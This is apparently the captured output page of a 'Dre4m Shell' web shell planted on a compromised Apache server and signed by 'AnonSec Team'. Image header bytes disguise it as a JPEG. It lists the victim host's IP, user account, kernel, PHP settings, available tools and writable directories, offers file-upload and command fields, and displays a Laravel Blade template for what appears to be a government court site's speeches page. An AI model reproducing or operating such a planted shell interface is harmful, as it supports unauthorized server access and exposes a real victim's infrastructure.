ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.222.23.176
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/nicnwebsiteUpgrade/resources/views/Speeches/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/nicnwebsiteUpgrade/resources/views/Speeches/home.blade.php
@extends('layouts.layout')
@section('pageTitle')
    Speeches
@endsection
@section('currentMedia')
    current-menu-item
@stop
<!-- /Header -->
@section('content')
@include('_partialView.PageTop', array('fileName' => '' ))
 <div class="container">
        <section id="content">
            <!-- Section -->
            <section class="full-width-bg">
                
                <div class="row">
                
                    <div class="col-lg-9 col-md-9 col-sm-8">

                        <div class="animate-onscroll">
                            <div class="banner-wrapper">
                                <div class="banner">
                                   <div class="row">
                                        <div class="col-lg-12 col-md-12-col-sm-12">
                                            <div class="body-ban">
                                            
                                                 <table class="table table-striped table-hover">
                                                            <thead>
                                                                <tr>
                                                                    <th>S/N</th>
                                                                    <th>AUTHOR</th>
                                                                    <th>TITLE</th>
                                                                    <th>DOWNLOAD</th>
                                                                </tr>
                                                            </thead>
                                                            <tbody>
                                                            @php
                                                                $key = 1;
                                                            @endphp
                                                            @foreach($getSpeech as $field)                 
                                                                <tr>
                                                                    <td>{{($getSpeech->currentpage()-1) * $getSpeech->perpage() + $key ++}}</td>
                                                                    <td>{{$field->author}}</td>
                                                                    <td>{{$field->title}}</td>
                                                                    <td class="text-center">
                                                                        <a href="{{'http://nicn.gov.ng/speech_paper/'.$field->pdf_name}}" target="_blank" title="Download this file">
                                                                            <img src="{{asset('images/pdf_icon.jpg')}}" />
                                                                        </a>
                                                                    </td>
                                                                </tr>
                                                            @endforeach
                                                            </tbody>
                                                        </table>
                                                        <br/>
                                                         <div align="right">
                                                          Showing {{($getSpeech->currentpage()-1)*$getSpeech->perpage()+1}}
                                                                  to {{$getSpeech->currentpage()*$getSpeech->perpage()}}
                                                                  of  {{$getSpeech->total()}} entries
                                                        </div>
                                                        <div class="hidden-print">{{ $getSpeech->links() }}</div>

                                            </div>
                                        </div>
                                    </div>

                                    
                                </div>
                            </div>
                        </div>

                    </div>
                    
                   <div class="col-lg-3 col-md-3 col-sm-4">
                        @include('_partialView.sidebar')
                   </div>

                </div>
            </section>
            <!-- /SideBar Section -->

        </section>
</div>
@stop


Anon7 - 2022
AnonSec Team